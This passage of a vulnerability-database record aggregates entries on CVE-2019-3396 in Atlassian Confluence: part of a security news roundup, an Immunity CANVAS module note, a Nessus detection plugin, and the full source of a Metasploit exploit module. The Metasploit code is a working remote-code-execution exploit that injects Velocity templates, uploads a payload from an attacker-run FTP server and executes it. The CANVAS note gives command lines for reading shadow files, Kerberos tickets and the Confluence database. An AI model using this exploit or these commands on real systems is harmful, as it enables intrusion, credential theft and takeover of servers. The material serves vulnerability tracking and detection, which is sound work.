Leak](<https://www.wsj.com/articles/u-k-government-fires-defense-secretary-gavin-williamson-over-huawei-leak-11556730704?emailToken=c7b9429b764699bae6432797f41319e4VriXbJEl2XSmmRWhaSOya86yVbzGG0UPjolqJ1JrGopNw3/e3uWGf9WgE427fJv/w16A82NBLDVMdDHOYyg0EHAaRSX2xAVeI37+zsXScE96s/8VMQVp/UWs7GMf/OVQjcyichuRgH5tqE0hFy4Wgg%3D%3D&reflink=article_copyURL_share>)**\n\n_British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China\u2019s Huawei Technologies Co. in the U.K.\u2019s telecoms network.__ _\n\n**[This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years](<https://fossbytes.com/hacker-selling-dangerous-windows-zero-day-hacks-for-3-years/>)**\n\n_A report by [ZDNet](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/#modal-absolute-f920f6d6-bb7b-4fdc-a2f1-cdd69c36ee85>) has revealed that a mysterious hacker is selling Windows zero-day exploits to the world\u2019s most notorious cybercrime groups for the past three years. At least three cyber-espionage groups also known as Advanced Persistent Threats (APTs) are regular customers of this hacker._\n\n**[Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/docker-hub-repository-suffers-data-breach-190-000-users-potentially-affected>)**\n\n_In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users.__ _\n\n**[IC3: BEC Cost Organizations US$1.2 Billion in 2018](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ic3-bec-cost-organizations-us-1-2-billion-in-2018>)**\n\n_In the recently published 2018 Internet Crime Report by the FBI\u2019s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses.__ _\n\n**[Trend Forward Capital\u2019s First Startup Pitch Competition in Dallas](<https://dallasinnovates.com/deadline-tuesday-for-trend-forward-capitals-1st-startup-pitch-competition-in-dallas/>)**\n\n_Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20.__ _\n\n**[BEC Scammers Steal US$1.75 Million From an Ohio Church](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/bec-scammers-steal-us-1-75-million-from-an-ohio-church>)**\n\n_The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account.__ _\n\n**[Cybersecurity Experts Share Tips And Insights For World Password Day](<https://www.forbes.com/sites/tonybradley/2019/05/02/cybersecurity-experts-share-tips-and-insights-for-world-password-day/#7fe9a6dc5c2e>)**\n\n_May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords. _\n\n**[Confluence Vulnerability Opens Door to GandCrab](<https://www.darkreading.com/vulnerabilities---threats/confluence-vulnerability-opens-door-to-gandcrab/d/d-id/1334577>)**\n\n_A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic._\n\nWere you surprised by the amount of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: BEC Attacks and Botnet Malware](<https://blog.trendmicro.com/this-week-in-security-news-bec-attacks-and-botnet-malware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-03T14:00:25", "published": "2019-05-03T14:00:25", "id": "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "href": "https://blog.trendmicro.com/this-week-in-security-news-bec-attacks-and-botnet-malware/", "type": "trendmicroblog", "title": "This Week in Security News: BEC Attacks and Botnet Malware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-12-11T14:23:09", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "description": "**Name**| confluence_macro_lfi \n---|--- \n**CVE**| CVE-2019-3396 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Confluence Server and Data Center - LFI (CVE-2019-3396) \n**Notes**| Repeatability: \nNOTES: \n \n \nA] Default behavior \n=================== \n \nBy default, this module attempts to automatically locate and then fetch \nthe confluence database. This is all possible thanks to the fact that \nthe LFI primitive will turn into a directory listing whenever a directory \nis specified instead of a file. \n \nTo perform the attack on the CLI one may type from $CANVAS_ROOT: (takes some time) \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Ovhost:'10.161.0.241' \n \nThere are however a couple of limitations: \n \n1\\. The search algorithm is rather naive and will not be able to handle \ninstallation with too specific installation paths. \n \n2\\. A huge problem with Confluence is the way Java handles the memory when \nthe LFI primitive is used. Because of this, whenever the file included \nwith the LFI primitive is too big (couple of megabytes), the server process \nmay actually crash being unable to allocate enough. This is in particular \ntrue with the confluence database which is more than 20 megabytes initially. \n \nNote: Linux seems much less stable than Windows in that regard. \n \n3\\. There is a limitation to how much the server can send. Our tests though \nshow that most of the time, while truncated, the partial DB will include \nuser information (such as potentially user hashes which may later be cracked). \n \n \nB] Targeting arbitrary files \n============================ \n \nFirst of all it should be noticed that both absolute paths can be used \nby the attacker on directories (directory listing) or files (file inclusion) \nthus depending on the configuration of the confluence service, several things \ncould be attempted: \n \n\\- Kerberos tickets retrieval \n\\- Shadow leak (if confluence is running as root) \n\\- Any sensitive credentials in general without ACL protection \n \nThis may or may not lead to RCE. \n \n \n1\\. Linux examples \n\\----------------- \n \n# Chosen absolute path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.239 -p 8090' \n \n \n2\\. Windows examples \n\\------------------- \n \n# Chosen relative path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Oremote_file:../web.xml \n \n#Chosen absolute path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Oremote_file:'C:\\windows\\win.ini' \n \nTested against: \n\\- Confluence 6.6.11 (Ubuntu) \n\\- Confluence 6.10.1 (Windows 2008 R2) \n \n \nVENDOR: Atlassian \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396 \nCVE Name: CVE-2019-3396 \n\n", "edition": 1, "modified": "2019-03-25T19:29:00", "published": "2019-03-25T19:29:00", "id": "CONFLUENCE_MACRO_LFI", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/confluence_macro_lfi", "title": "Immunity Canvas: CONFLUENCE_MACRO_LFI", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "description": "File disclosure vulnerability in Confluence widget connector macro\n\nVulnerability Type: File Disclosure", "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "E-686", "href": "", "type": "dsquare", "title": "Confluence File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-04-19T14:21:33", "description": "", "published": "2019-04-19T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": "EDB-ID:46731", "href": "https://www.exploit-db.com/exploits/46731", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embed online videos, slideshows, photostreams and more directly into page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\r\n By default, Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles ftp RETP command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns a upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns checking template.\r\n #\r\n # @return [String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns Java's getting property template.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns dummy template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code to the template.\r\n #\r\n # @param service_url [String] Address of template to injection.\r\n # @return [void]\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n @command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target in Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Linux platform.\r\n #\r\n # @return [void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46731"}], "nessus": [{"lastseen": "2020-05-03T01:56:50", "description": "According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-11T00:00:00", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2019-3396.NASL", "href": "https://www.tenable.com/plugins/nessus/124004", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124004);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/01\");\n\n script_cve_id(\"CVE-2019-3396\");\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection\");\n script_summary(english:\"Checks the Atlassian Confluence instance for a template injection.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\na template injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp_name = 'confluence';\n\nport = get_http_port(default:8090);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\npath = app_info['path'];\nif(path[strlen(path)-1] != '/') path += '/';\n\nitem = path + 'rest/tinymce/1/macro/preview';\nheader = {'Content-Type':'application/json','User-Agent':''};\ndata = '{\"contentId\":\"1337\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":' +\n '{\"url\":\"http://localhost//www.youtube.com/watch?v=w0gtNxBWIEY\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}';\n\nres = http_send_recv3(method:'POST', item:item, port:port, add_headers:header, data:data, exit_on_fail:TRUE);\n\nif('</web-app>' >< res[2])\n security_report_v4(severity:SECURITY_HOLE, port:port, generic:TRUE, request:[http_last_sent_request()]);\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Atlassian Confluence', build_url(qs:path, port:port));\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:25:47", "description": "According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2019-03-22T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_6_6_12.NASL", "href": "https://www.tenable.com/plugins/nessus/123008", "sourceData": "#\n# (C) Tenable Network Security, 